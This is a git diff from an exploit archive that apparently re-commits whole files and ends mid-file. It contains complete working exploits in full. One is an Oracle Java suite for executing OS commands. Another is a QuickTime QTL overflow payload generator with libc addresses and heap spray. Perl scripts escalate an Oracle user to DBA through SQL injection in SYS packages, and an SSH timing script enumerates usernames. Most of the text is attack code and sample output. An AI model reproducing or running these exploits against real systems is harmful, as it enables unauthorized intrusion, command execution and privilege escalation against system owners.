sqlplus "/ as sysdba" --- [...] --- SQL> @raptor_oraexec.sql --- [...] --- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l > /tmp/aaa'); --- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l / > /tmp/bbb'); --- SQL> exec dbms_java.set_output(2000); --- SQL> set serveroutput on; --- SQL> exec javareadfile('/tmp/mytest'); --- /bin/ls -l > /tmp/aaa --- /bin/ls -l / >/tmp/bbb --- SQL> exec javacmd('/bin/sh /tmp/mytest'); --- SQL> !sh --- $ ls -rtl /tmp/ --- [...] --- -rw-r--r-- 1 oracle system 45 Nov 22 12:20 mytest --- -rw-r--r-- 1 oracle system 1645 Nov 22 12:20 aaa --- -rw-r--r-- 1 oracle system 8267 Nov 22 12:20 bbb --- [...] --- - -create or replace and resolve java source named "oraexec" as -import java.lang.*; -import java.io.*; -public class oraexec -{ - /* - * Command execution module - */ - public static void execCommand(String command) throws IOException - { - Runtime.getRuntime().exec(command); - } - - /* - * File reading module - */ - public static void readFile(String filename) throws IOException - { - FileReader f = new FileReader(filename); - BufferedReader fr = new BufferedReader(f); - String text = fr.readLine(); - while (text != null) { - System.out.println(text); - text = fr.readLine(); - } - fr.close(); - } - - /* - * File writing module - */ - public static void writeFile(String filename, String line) throws IOException - { - FileWriter f = new FileWriter(filename, true); /* append */ - BufferedWriter fw = new BufferedWriter(f); - fw.write(line); - fw.write("\n"); - fw.close(); - } -} -/ - --- usage: exec javacmd('command'); -create or replace procedure javacmd(p_command varchar2) as -language java -name 'oraexec.execCommand(java.lang.String)'; -/ - --- usage: exec dbms_java.set_output(2000); --- set serveroutput on; --- exec javareadfile('/path/to/file'); -create or replace procedure javareadfile(p_filename in varchar2) as -language java -name 'oraexec.readFile(java.lang.String)'; -/ - --- usage: exec javawritefile('/path/to/file', 'line to append'); -create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as -language java -name 'oraexec.writeFile(java.lang.String, java.lang.String)'; -/ - --- milw0rm.com [2006-11-23] +-- +-- $Id: raptor_oraexec.sql,v 1.2 2006/11/23 23:40:16 raptor Exp $ +-- +-- raptor_oraexec.sql - java exploitation suite for oracle +-- Copyright (c) 2006 Marco Ivaldi +-- +-- This is an exploitation suite for Oracle written in Java. Use it to +-- read/write files and execute OS commands with the privileges of the +-- RDBMS, if you have the required permissions (DBA role and SYS:java). +-- +-- "The Oracle RDBMS could almost be considered as a shell like bash or the +-- Windows Command Prompt; it's not only capable of storing data but can also +-- be used to completely access the file system and run operating system +-- commands" -- David Litchfield (http://www.databasesecurity.com/) +-- +-- Usage example: +-- $ sqlplus "/ as sysdba" +-- [...] +-- SQL> @raptor_oraexec.sql +-- [...] +-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l > /tmp/aaa'); +-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l / > /tmp/bbb'); +-- SQL> exec dbms_java.set_output(2000); +-- SQL> set serveroutput on; +-- SQL> exec javareadfile('/tmp/mytest'); +-- /bin/ls -l > /tmp/aaa +-- /bin/ls -l / >/tmp/bbb +-- SQL> exec javacmd('/bin/sh /tmp/mytest'); +-- SQL> !sh +-- $ ls -rtl /tmp/ +-- [...] +-- -rw-r--r-- 1 oracle system 45 Nov 22 12:20 mytest +-- -rw-r--r-- 1 oracle system 1645 Nov 22 12:20 aaa +-- -rw-r--r-- 1 oracle system 8267 Nov 22 12:20 bbb +-- [...] +-- + +create or replace and resolve java source named "oraexec" as +import java.lang.*; +import java.io.*; +public class oraexec +{ + /* + * Command execution module + */ + public static void execCommand(String command) throws IOException + { + Runtime.getRuntime().exec(command); + } + + /* + * File reading module + */ + public static void readFile(String filename) throws IOException + { + FileReader f = new FileReader(filename); + BufferedReader fr = new BufferedReader(f); + String text = fr.readLine(); + while (text != null) { + System.out.println(text); + text = fr.readLine(); + } + fr.close(); + } + + /* + * File writing module + */ + public static void writeFile(String filename, String line) throws IOException + { + FileWriter f = new FileWriter(filename, true); /* append */ + BufferedWriter fw = new BufferedWriter(f); + fw.write(line); + fw.write("\n"); + fw.close(); + } +} +/ + +-- usage: exec javacmd('command'); +create or replace procedure javacmd(p_command varchar2) as +language java +name 'oraexec.execCommand(java.lang.String)'; +/ + +-- usage: exec dbms_java.set_output(2000); +-- set serveroutput on; +-- exec javareadfile('/path/to/file'); +create or replace procedure javareadfile(p_filename in varchar2) as +language java +name 'oraexec.readFile(java.lang.String)'; +/ + +-- usage: exec javawritefile('/path/to/file', 'line to append'); +create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as +language java +name 'oraexec.writeFile(java.lang.String, java.lang.String)'; +/ + +-- milw0rm.com [2006-11-23] diff --git a/platforms/multiple/remote/300.c b/platforms/multiple/remote/300.c index 64897881d..0dd81a259 100755 --- a/platforms/multiple/remote/300.c +++ b/platforms/multiple/remote/300.c @@ -1052,6 +1052,6 @@ int sh(int sockfd) } exit(0); } - - -// milw0rm.com [2004-06-25] + + +// milw0rm.com [2004-06-25] diff --git a/platforms/multiple/remote/3064.rb b/platforms/multiple/remote/3064.rb index 73589aafb..b99f34278 100755 --- a/platforms/multiple/remote/3064.rb +++ b/platforms/multiple/remote/3064.rb @@ -1,62 +1,62 @@ -#!/usr/bin/ruby -# Copyright (c) LMH -# Kevin Finisterre -# -# Notes: -# Our command string is loaded on memory at a static address normally, -# but this depends on execution method and the string length. The address set in this exploit will -# be likely successful if we open the resulting QTL file directly, without having an -# instance of Quicktime running. Although, when using another method and string, you'll need -# to find the address. -# For 100% reliable exploitation you can always use the /bin/sh address, -# but that's not as a cool as having your box welcoming the new year. -# Do whatever you prefer. That said, enjoy. -# -# see http://projects.info-pull.com/moab/MOAB-01-01-2007.html - -# Command string: Use whatever you like. -# Remember that changing this will also need a change of the target address for system(), -# unless string length is the same. -CMD_STRING = "/usr/bin/say Happy new year shit bag" - -# Mac OS X 10.4.8 (8L2127) -EBP_ADDR = 0xdeadbabe -SYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back -SETUID_ADDR = 0x900334f0 -CURL_ADDR = 0x916c24bc # /usr/bin/curl -SHELL_ADDR = 0x918bef3a # /bin/sh -CMDSTR_ADDR = [ - SHELL_ADDR, # 0 addr to static /bin/sh (lame) - 0x17a053c, # 1 addr to our command string (cool) :> (change as necessary) - 0xbabeface, # 2 bogus addr for testing. - CURL_ADDR # 3 addr to '/usr/bin/curl' - ] - -# Payload -HAPPY = ("A" * 299) + - [EBP_ADDR].pack("V") + - [SYSTEM_ADDR].pack("V") + - [SETUID_ADDR].pack("V") + - [CMDSTR_ADDR[1]].pack("V") # change array index for using diff. addr - -# Sleds: not necessary if using /bin/bash addr or other built-in addresses. -# although, for using our own fu, we need to spray some data for better reliability -# the goal is causing allocation of large heap chunks -NEW = ("\x90" * 30000) + CMD_STRING # feed the heap -YEAR = ("\x90" * 30000) + CMD_STRING # go johnny, go -APPLE = ("\x90" * 30000) + "EOOM" # feed the heap more -BOYZ = ("\x90" * 30000) + "FOOM" # and more - -# QTL output template -QTL_CONTENT = "" + - "" + - "\n" - -target_file = File.open("pwnage.qtl", "w+") { |f| - f.print(QTL_CONTENT) - f.close -} - -# milw0rm.com [2007-01-01] +#!/usr/bin/ruby +# Copyright (c) LMH +# Kevin Finisterre +# +# Notes: +# Our command string is loaded on memory at a static address normally, +# but this depends on execution method and the string length. The address set in this exploit will +# be likely successful if we open the resulting QTL file directly, without having an +# instance of Quicktime running. Although, when using another method and string, you'll need +# to find the address. +# For 100% reliable exploitation you can always use the /bin/sh address, +# but that's not as a cool as having your box welcoming the new year. +# Do whatever you prefer. That said, enjoy. +# +# see http://projects.info-pull.com/moab/MOAB-01-01-2007.html + +# Command string: Use whatever you like. +# Remember that changing this will also need a change of the target address for system(), +# unless string length is the same. +CMD_STRING = "/usr/bin/say Happy new year shit bag" + +# Mac OS X 10.4.8 (8L2127) +EBP_ADDR = 0xdeadbabe +SYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back +SETUID_ADDR = 0x900334f0 +CURL_ADDR = 0x916c24bc # /usr/bin/curl +SHELL_ADDR = 0x918bef3a # /bin/sh +CMDSTR_ADDR = [ + SHELL_ADDR, # 0 addr to static /bin/sh (lame) + 0x17a053c, # 1 addr to our command string (cool) :> (change as necessary) + 0xbabeface, # 2 bogus addr for testing. + CURL_ADDR # 3 addr to '/usr/bin/curl' + ] + +# Payload +HAPPY = ("A" * 299) + + [EBP_ADDR].pack("V") + + [SYSTEM_ADDR].pack("V") + + [SETUID_ADDR].pack("V") + + [CMDSTR_ADDR[1]].pack("V") # change array index for using diff. addr + +# Sleds: not necessary if using /bin/bash addr or other built-in addresses. +# although, for using our own fu, we need to spray some data for better reliability +# the goal is causing allocation of large heap chunks +NEW = ("\x90" * 30000) + CMD_STRING # feed the heap +YEAR = ("\x90" * 30000) + CMD_STRING # go johnny, go +APPLE = ("\x90" * 30000) + "EOOM" # feed the heap more +BOYZ = ("\x90" * 30000) + "FOOM" # and more + +# QTL output template +QTL_CONTENT = "" + + "" + + "\n" + +target_file = File.open("pwnage.qtl", "w+") { |f| + f.print(QTL_CONTENT) + f.close +} + +# milw0rm.com [2007-01-01] diff --git a/platforms/multiple/remote/311.pl b/platforms/multiple/remote/311.pl index 0926f426b..77b2a922d 100755 --- a/platforms/multiple/remote/311.pl +++ b/platforms/multiple/remote/311.pl @@ -137,6 +137,6 @@ sub HexDump push(@line, sprintf("%02X", $val)); } print join(' ', @line), "\n"; -} - -# milw0rm.com [2004-07-10] +} + +# milw0rm.com [2004-07-10] diff --git a/platforms/multiple/remote/3269.pl b/platforms/multiple/remote/3269.pl index 4d0afc750..10a9f77d3 100755 --- a/platforms/multiple/remote/3269.pl +++ b/platforms/multiple/remote/3269.pl @@ -1,120 +1,120 @@ -#!/usr/bin/perl -# -# Remote Oracle dbms_export_extension exploit (any version) -# Grant or revoke dba permission to unprivileged user -# -# Tested on Oracle 10g - Release 10.2.0.1.0 -# Oracle 9i - Release 9.2.0.2.0 -# -# REF: http://www.securityfocus.com/bid/17699 -# -# AUTHOR: Andrea "bunker" Purificato -# http://rawlab.mindcreations.com -# -# DATE: Copyright 2007 - Sun Feb 4 15:53:04 CET 2007 -# -# Oracle InstantClient (basic + sdk) required for DBD::Oracle -# -use warnings; -use strict; -use DBI; -use DBD::Oracle; -use Getopt::Std; -use vars qw/ %opt /; - -sub usage { - print <<"USAGE"; - -Syntax: $0 -h -s -u -p -g|-r - -Options: - -h target server address - -s target sid name - -u user - -p password - - -g|-r (g)rant dba to user | (r)evoke dba from user - -USAGE - exit 0 -} - -my $opt_string = 'h:s:u:p:gr'; -getopts($opt_string, \%opt) or &usage; -&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); -&usage if ( !$opt{g} and !$opt{r} ); -my $user = uc $opt{u}; - -my $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; - -my $sqlcmd = "GRANT DBA TO $user"; - -print "[-] Wait...\n"; -$dbh->{RaiseError} = 1; - -if ($opt{r}) { - print "[-] Revoking DBA from $user...\n"; - $sqlcmd = "REVOKE DBA FROM $user"; - $dbh->do( $sqlcmd ); - print "[-] Done!\n"; - $dbh->disconnect; - exit; -} - -$dbh->do( qq{ -CREATE OR REPLACE PACKAGE BUNKERPKG AUTHID CURRENT_USER IS -FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 -VARCHAR2,p4 VARCHAR2,env SYS.odcienv) RETURN NUMBER; -END; -} ); - -print "[-] Building evil package\n"; - -$dbh->do(qq{ -CREATE OR REPLACE PACKAGE BODY BUNKERPKG IS -FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 -VARCHAR2,p4 VARCHAR2,env SYS.odcienv) RETURN NUMBER IS -pragma autonomous_transaction; -BEGIN -EXECUTE IMMEDIATE '$sqlcmd'; -COMMIT; -RETURN(1); -END; -END; -} ); - -print "[-] Finishing evil package\n"; - -$dbh->do(qq{ -DECLARE -INDEX_NAME VARCHAR2(200); -INDEX_SCHEMA VARCHAR2(200); -TYPE_NAME VARCHAR2(200); -TYPE_SCHEMA VARCHAR2(200); -VERSION VARCHAR2(200); -NEWBLOCK PLS_INTEGER; -GMFLAGS NUMBER; -v_Return VARCHAR2(200); -BEGIN -INDEX_NAME := 'A1'; -INDEX_SCHEMA := '$user'; -TYPE_NAME := 'BUNKERPKG'; -TYPE_SCHEMA := '$user'; -VERSION := ''; -GMFLAGS := 1; -v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA( -INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME -=> TYPE_NAME, -TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK => -NEWBLOCK, GMFLAGS => GMFLAGS -); -END; -} ); - -print "[-] YOU GOT THE POWAH!!\n"; - -$dbh->disconnect; - -exit; - -# milw0rm.com [2007-02-05] +#!/usr/bin/perl +# +# Remote Oracle dbms_export_extension exploit (any version) +# Grant or revoke dba permission to unprivileged user +# +# Tested on Oracle 10g - Release 10.2.0.1.0 +# Oracle 9i - Release 9.2.0.2.0 +# +# REF: http://www.securityfocus.com/bid/17699 +# +# AUTHOR: Andrea "bunker" Purificato +# http://rawlab.mindcreations.com +# +# DATE: Copyright 2007 - Sun Feb 4 15:53:04 CET 2007 +# +# Oracle InstantClient (basic + sdk) required for DBD::Oracle +# +use warnings; +use strict; +use DBI; +use DBD::Oracle; +use Getopt::Std; +use vars qw/ %opt /; + +sub usage { + print <<"USAGE"; + +Syntax: $0 -h -s -u -p -g|-r + +Options: + -h target server address + -s target sid name + -u user + -p password + + -g|-r (g)rant dba to user | (r)evoke dba from user + +USAGE + exit 0 +} + +my $opt_string = 'h:s:u:p:gr'; +getopts($opt_string, \%opt) or &usage; +&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); +&usage if ( !$opt{g} and !$opt{r} ); +my $user = uc $opt{u}; + +my $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; + +my $sqlcmd = "GRANT DBA TO $user"; + +print "[-] Wait...\n"; +$dbh->{RaiseError} = 1; + +if ($opt{r}) { + print "[-] Revoking DBA from $user...\n"; + $sqlcmd = "REVOKE DBA FROM $user"; + $dbh->do( $sqlcmd ); + print "[-] Done!\n"; + $dbh->disconnect; + exit; +} + +$dbh->do( qq{ +CREATE OR REPLACE PACKAGE BUNKERPKG AUTHID CURRENT_USER IS +FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 +VARCHAR2,p4 VARCHAR2,env SYS.odcienv) RETURN NUMBER; +END; +} ); + +print "[-] Building evil package\n"; + +$dbh->do(qq{ +CREATE OR REPLACE PACKAGE BODY BUNKERPKG IS +FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 +VARCHAR2,p4 VARCHAR2,env SYS.odcienv) RETURN NUMBER IS +pragma autonomous_transaction; +BEGIN +EXECUTE IMMEDIATE '$sqlcmd'; +COMMIT; +RETURN(1); +END; +END; +} ); + +print "[-] Finishing evil package\n"; + +$dbh->do(qq{ +DECLARE +INDEX_NAME VARCHAR2(200); +INDEX_SCHEMA VARCHAR2(200); +TYPE_NAME VARCHAR2(200); +TYPE_SCHEMA VARCHAR2(200); +VERSION VARCHAR2(200); +NEWBLOCK PLS_INTEGER; +GMFLAGS NUMBER; +v_Return VARCHAR2(200); +BEGIN +INDEX_NAME := 'A1'; +INDEX_SCHEMA := '$user'; +TYPE_NAME := 'BUNKERPKG'; +TYPE_SCHEMA := '$user'; +VERSION := ''; +GMFLAGS := 1; +v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA( +INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME +=> TYPE_NAME, +TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK => +NEWBLOCK, GMFLAGS => GMFLAGS +); +END; +} ); + +print "[-] YOU GOT THE POWAH!!\n"; + +$dbh->disconnect; + +exit; + +# milw0rm.com [2007-02-05] diff --git a/platforms/multiple/remote/3303.sh b/platforms/multiple/remote/3303.sh index 0520d12f6..5eee236ee 100755 --- a/platforms/multiple/remote/3303.sh +++ b/platforms/multiple/remote/3303.sh @@ -1,87 +1,87 @@ -#!/bin/bash - -# -# $Id: raptor_sshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $ -# -# raptor_sshtime - [Open]SSH remote timing attack exploit -# Copyright (c) 2006 Marco Ivaldi -# -# OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately -# sends an error message when a user does not exist, which allows remote -# attackers to determine valid usernames via a timing attack (CVE-2003-0190). -# -# OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions, -# and possibly under limited configurations, allows remote attackers to -# determine valid usernames via timing discrepancies in which responses take -# longer for valid usernames than invalid ones, as demonstrated by sshtime. -# NOTE: as of 20061014, it appears that this issue is dependent on the use of -# manually-set passwords that causes delays when processing /etc/shadow due to -# an increased number of rounds (CVE-2006-5229). -# -# This is a simple shell script based on expect meant to remotely analyze -# timing differences in sshd "Permission denied" replies. Depending on OpenSSH -# version and configuration, it may lead to disclosure of valid usernames. -# -# Usage example: -# [make sure the target hostkey has been approved before] -# ./sshtime 192.168.0.1 dict.txt -# - -# Some vars -port=22 - -# Command line -host=$1 -dict=$2 - -# Local functions -function head() { - echo "" - echo "raptor_sshtime - [Open]SSH remote timing attack exploit" - echo "Copyright (c) 2006 Marco Ivaldi " - echo "" -} - -function foot() { - echo "" - exit 0 -} - -function usage() { - head - echo "[make sure the target hostkey has been approved before]" - echo "" - echo "usage : ./sshtime " - echo "example: ./sshtime 192.168.0.1 dict.txt" - foot -} - -function notfound() { - head - echo "error : expect interpreter not found!" - foot -} - -# Check if expect is there -expect=`which expect 2>/dev/null` -if [ $? -ne 0 ]; then - notfound -fi - -# Input control -if [ -z "$2" ]; then - usage -fi - -# Perform the bruteforce attack -head - -for user in `cat $dict` -do - echo -ne "$user@$host\t\t" - (time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l $user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof {exit}}") 2>&1 | grep real -done - -foot - -# milw0rm.com [2007-02-13] +#!/bin/bash + +# +# $Id: raptor_sshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $ +# +# raptor_sshtime - [Open]SSH remote timing attack exploit +# Copyright (c) 2006 Marco Ivaldi +# +# OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately +# sends an error message when a user does not exist, which allows remote +# attackers to determine valid usernames via a timing attack (CVE-2003-0190). +# +# OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions, +# and possibly under limited configurations, allows remote attackers to +# determine valid usernames via timing discrepancies in which responses take +# longer for valid usernames than invalid ones, as demonstrated by sshtime. +# NOTE: as of 20061014, it appears that this issue is dependent on the use of +# manually-set passwords that causes delays when processing /etc/shadow due to +# an increased number of rounds (CVE-2006-5229). +# +# This is a simple shell script based on expect meant to remotely analyze +# timing differences in sshd "Permission denied" replies. Depending on OpenSSH +# version and configuration, it may lead to disclosure of valid usernames. +# +# Usage example: +# [make sure the target hostkey has been approved before] +# ./sshtime 192.168.0.1 dict.txt +# + +# Some vars +port=22 + +# Command line +host=$1 +dict=$2 + +# Local functions +function head() { + echo "" + echo "raptor_sshtime - [Open]SSH remote timing attack exploit" + echo "Copyright (c) 2006 Marco Ivaldi " + echo "" +} + +function foot() { + echo "" + exit 0 +} + +function usage() { + head + echo "[make sure the target hostkey has been approved before]" + echo "" + echo "usage : ./sshtime " + echo "example: ./sshtime 192.168.0.1 dict.txt" + foot +} + +function notfound() { + head + echo "error : expect interpreter not found!" + foot +} + +# Check if expect is there +expect=`which expect 2>/dev/null` +if [ $? -ne 0 ]; then + notfound +fi + +# Input control +if [ -z "$2" ]; then + usage +fi + +# Perform the bruteforce attack +head + +for user in `cat $dict` +do + echo -ne "$user@$host\t\t" + (time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l $user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof {exit}}") 2>&1 | grep real +done + +foot + +# milw0rm.com [2007-02-13] diff --git a/platforms/multiple/remote/3358.pl b/platforms/multiple/remote/3358.pl index 4f2470a2d..4e0c2a49f 100755 --- a/platforms/multiple/remote/3358.pl +++ b/platforms/multiple/remote/3358.pl @@ -1,125 +1,125 @@ -#!/usr/bin/perl -# -# Remote Oracle KUPW$WORKER.MAIN exploit (10g) -# -# Grant or revoke dba permission to unprivileged user -# -# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" -# -# REF: http://www.securityfocus.com/archive/1/440439 -# -# AUTHOR: Andrea "bunker" Purificato -# http://rawlab.mindcreations.com -# -# DATE: Copyright 2007 - Thu Feb 22 17:48:27 CET 2007 -# -# Oracle InstantClient (basic + sdk) required for DBD::Oracle -# -# -# bunker@fin:~$ perl kupw-worker.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupw-worker.pl line 94. -# [-] Done! -# -# bunker@fin:~$ perl kupw-worker.pl -h localhost -s test -u bunker -p **** -g -# [-] Wait... -# [-] Creating evil function... -# [-] Go ...(don't worry about errors)! -# DBD::Oracle::st execute failed: ORA-39079: unable to enqueue message DG -# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 86 -# ORA-06512: at "SYS.KUPC$QUE_INT", line 912 -# ORA-00931: missing identifier -# ORA-06512: at "SYS.KUPC$QUE_INT", line 1910 -# ORA-06512: at line 1 -# ORA-06512: at "SYS.KUPC$QUEUE_INT", line 591 -# ORA-06512: at "SYS.KUPW$WORKER", line 13468 -# ORA-06512: at "SYS.KUPW$WORKER", line 5810 -# ORA-39125: Worker unexpected fatal error in KUPW$WORKER.MAIN while calling KUPC$QUEUE_INT.ATTACH_QUEUE [] -# ORA-06512: at "SYS.KUPW$WORKER", line 1243 -# ORA-31626: job does not exist -# ORA-39086: cannot retrieve job information -# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " -# BEGIN -# SYS.KUPW$WORKER.MAIN(''' AND 0=BUNKER.own--',''); -# END;"] at kupw-worker.pl line 116. -# [-] YOU GOT THE POWAH!! -# -# bunker@fin:~$ perl kupw-worker.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# [-] Done! -# - -use warnings; -use strict; -use DBI; -use Getopt::Std; -use vars qw/ %opt /; - -sub usage { - print <<"USAGE"; - -Syntax: $0 -h -s -u -p -g|-r [-P ] - -Options: - -h target server address - -s target sid name - -u user - -p password - - -g|-r (g)rant dba to user | (r)evoke dba from user - [-P Oracle port] - -USAGE - exit 0 -} - -my $opt_string = 'h:s:u:p:grP:'; -getopts($opt_string, \%opt) or &usage; -&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); -&usage if ( !$opt{g} and !$opt{r} ); -my $user = uc $opt{u}; - -my $dbh = undef; -if ($opt{P}) { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; -} else { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; -} - -my $sqlcmd = "GRANT DBA TO $user"; -print "[-] Wait...\n"; - -if ($opt{r}) { - print "[-] Revoking DBA from $user...\n"; - $sqlcmd = "REVOKE DBA FROM $user"; - $dbh->do( $sqlcmd ); - print "[-] Done!\n"; - $dbh->disconnect; - exit; -} - -print "[-] Creating evil function...\n"; -$dbh->do( qq{ -CREATE OR REPLACE FUNCTION OWN RETURN NUMBER - AUTHID CURRENT_USER AS - PRAGMA AUTONOMOUS_TRANSACTION; -BEGIN - EXECUTE IMMEDIATE '$sqlcmd'; COMMIT; - RETURN(0); -END; -} ); - -print "[-] Go ...(don't worry about errors)!\n"; -my $sth = $dbh->prepare( qq{ -BEGIN - SYS.KUPW\$WORKER.MAIN(''' AND 0=$user.own--',''); -END;}); -$sth->execute; -$sth->finish; -print "[-] YOU GOT THE POWAH!!\n"; -$dbh->disconnect; -exit; - -# milw0rm.com [2007-02-22] +#!/usr/bin/perl +# +# Remote Oracle KUPW$WORKER.MAIN exploit (10g) +# +# Grant or revoke dba permission to unprivileged user +# +# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" +# +# REF: http://www.securityfocus.com/archive/1/440439 +# +# AUTHOR: Andrea "bunker" Purificato +# http://rawlab.mindcreations.com +# +# DATE: Copyright 2007 - Thu Feb 22 17:48:27 CET 2007 +# +# Oracle InstantClient (basic + sdk) required for DBD::Oracle +# +# +# bunker@fin:~$ perl kupw-worker.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupw-worker.pl line 94. +# [-] Done! +# +# bunker@fin:~$ perl kupw-worker.pl -h localhost -s test -u bunker -p **** -g +# [-] Wait... +# [-] Creating evil function... +# [-] Go ...(don't worry about errors)! +# DBD::Oracle::st execute failed: ORA-39079: unable to enqueue message DG +# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 86 +# ORA-06512: at "SYS.KUPC$QUE_INT", line 912 +# ORA-00931: missing identifier +# ORA-06512: at "SYS.KUPC$QUE_INT", line 1910 +# ORA-06512: at line 1 +# ORA-06512: at "SYS.KUPC$QUEUE_INT", line 591 +# ORA-06512: at "SYS.KUPW$WORKER", line 13468 +# ORA-06512: at "SYS.KUPW$WORKER", line 5810 +# ORA-39125: Worker unexpected fatal error in KUPW$WORKER.MAIN while calling KUPC$QUEUE_INT.ATTACH_QUEUE [] +# ORA-06512: at "SYS.KUPW$WORKER", line 1243 +# ORA-31626: job does not exist +# ORA-39086: cannot retrieve job information +# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " +# BEGIN +# SYS.KUPW$WORKER.MAIN(''' AND 0=BUNKER.own--',''); +# END;"] at kupw-worker.pl line 116. +# [-] YOU GOT THE POWAH!! +# +# bunker@fin:~$ perl kupw-worker.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# [-] Done! +# + +use warnings; +use strict; +use DBI; +use Getopt::Std; +use vars qw/ %opt /; + +sub usage { + print <<"USAGE"; + +Syntax: $0 -h -s -u -p -g|-r [-P ] + +Options: + -h target server address + -s target sid name + -u user + -p password + + -g|-r (g)rant dba to user | (r)evoke dba from user + [-P Oracle port] + +USAGE + exit 0 +} + +my $opt_string = 'h:s:u:p:grP:'; +getopts($opt_string, \%opt) or &usage; +&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); +&usage if ( !$opt{g} and !$opt{r} ); +my $user = uc $opt{u}; + +my $dbh = undef; +if ($opt{P}) { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; +} else { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; +} + +my $sqlcmd = "GRANT DBA TO $user"; +print "[-] Wait...\n"; + +if ($opt{r}) { + print "[-] Revoking DBA from $user...\n"; + $sqlcmd = "REVOKE DBA FROM $user"; + $dbh->do( $sqlcmd ); + print "[-] Done!\n"; + $dbh->disconnect; + exit; +} + +print "[-] Creating evil function...\n"; +$dbh->do( qq{ +CREATE OR REPLACE FUNCTION OWN RETURN NUMBER + AUTHID CURRENT_USER AS + PRAGMA AUTONOMOUS_TRANSACTION; +BEGIN + EXECUTE IMMEDIATE '$sqlcmd'; COMMIT; + RETURN(0); +END; +} ); + +print "[-] Go ...(don't worry about errors)!\n"; +my $sth = $dbh->prepare( qq{ +BEGIN + SYS.KUPW\$WORKER.MAIN(''' AND 0=$user.own--',''); +END;}); +$sth->execute; +$sth->finish; +print "[-] YOU GOT THE POWAH!!\n"; +$dbh->disconnect; +exit; + +# milw0rm.com [2007-02-22] diff --git a/platforms/multiple/remote/3359.pl b/platforms/multiple/remote/3359.pl index 5bc56493d..36f3483e9 100755 --- a/platforms/multiple/remote/3359.pl +++ b/platforms/multiple/remote/3359.pl @@ -1,125 +1,125 @@ -#!/usr/bin/perl -# -# Remote Oracle KUPV$FT.ATTACH_JOB exploit (10g) -# -# Grant or revoke dba permission to unprivileged user -# -# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" -# -# REF: http://www.securityfocus.com/bid/16294 -# -# AUTHOR: Andrea "bunker" Purificato -# http://rawlab.mindcreations.com -# -# DATE: Copyright 2007 - Thu Feb 22 17:18:55 CET 2007 -# -# Oracle InstantClient (basic + sdk) required for DBD::Oracle -# -# -# bunker@fin:~$ perl kupv-ft_attach_job.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupv-ft_attach_job.pl line 61. -# [-] Done! -# -# bunker@fin:~$ perl kupv-ft_attach_job.pl -h localhost -s test -u bunker -p **** -g -# [-] Wait... -# [-] Creating evil function... -# [-] Go ...(don't worry about error)! -# 